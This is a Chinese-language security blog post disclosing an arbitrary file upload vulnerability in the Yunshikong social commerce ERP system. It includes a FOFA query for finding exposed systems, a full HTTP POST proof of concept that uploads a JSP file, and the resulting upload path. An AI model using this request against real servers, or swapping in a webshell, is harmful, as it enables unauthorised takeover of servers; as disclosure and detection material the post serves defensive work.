云时空社会化商业ERP系统任意文件上传漏洞

admin 2023年12月20日10:00:56评论27 views字数 1201阅读4分0秒阅读模式


一、漏洞描述


云时空商业ERP以大型集团供应链系统为支撑,是基于互联网技术的多渠道模式营销服务管理体系,可以整合线上和线下交易模式,覆盖企业经营管理应用各个方面。有效掌控全流程情况,敏捷捕捉消费者需求,快速响应市场变化,规避经营风险,以市场为导向,优化部署营销资源,协同产销、供应与服务,帮助您的企业构建敏捷的经营管理平台,还能通过互联网、人工智能等创新模式,整合流通企业上下游产业链资源,协助您共享数字服务,提升企业数字化管控效率。

该系统存在任意文件上传漏洞,通过此漏洞,攻击者可上传webshell木马,远程控制服务器。

云时空社会化商业ERP系统任意文件上传漏洞

二、网络空间搜索引擎搜索

fofa查询

app="云时空社会化商业ERP系统"

云时空社会化商业ERP系统任意文件上传漏洞

三、漏洞复现

POC

POST /servlet/fileupload/gpy HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=4eea98d02AEa93f60ea08dE3C18A1388Content-Length: 238
--4eea98d02AEa93f60ea08dE3C18A1388Content-Disposition: form-data; name="file1"; filename="check.jsp"Content-Type: application/octet-stream
<% out.println("This website has a vulnerability"); %>--4eea98d02AEa93f60ea08dE3C18A1388--

云时空社会化商业ERP系统任意文件上传漏洞

文件上传成功后路径为:/uploads/pics/上传日期/check.jsp

云时空社会化商业ERP系统任意文件上传漏洞

四、漏洞检测

=

pocsuite3漏洞检测

云时空社会化商业ERP系统任意文件上传漏洞

漏洞检测脚本已上传免费漏洞库

地址:

https://github.com/Vme18000yuan/FreePOC


免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


云时空社会化商业ERP系统任意文件上传漏洞




原文始发于微信公众号(网络安全透视镜):云时空社会化商业ERP系统任意文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月20日10:00:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   云时空社会化商业ERP系统任意文件上传漏洞https://cn-sec.com/archives/2318379.html

发表评论

匿名网友 填写信息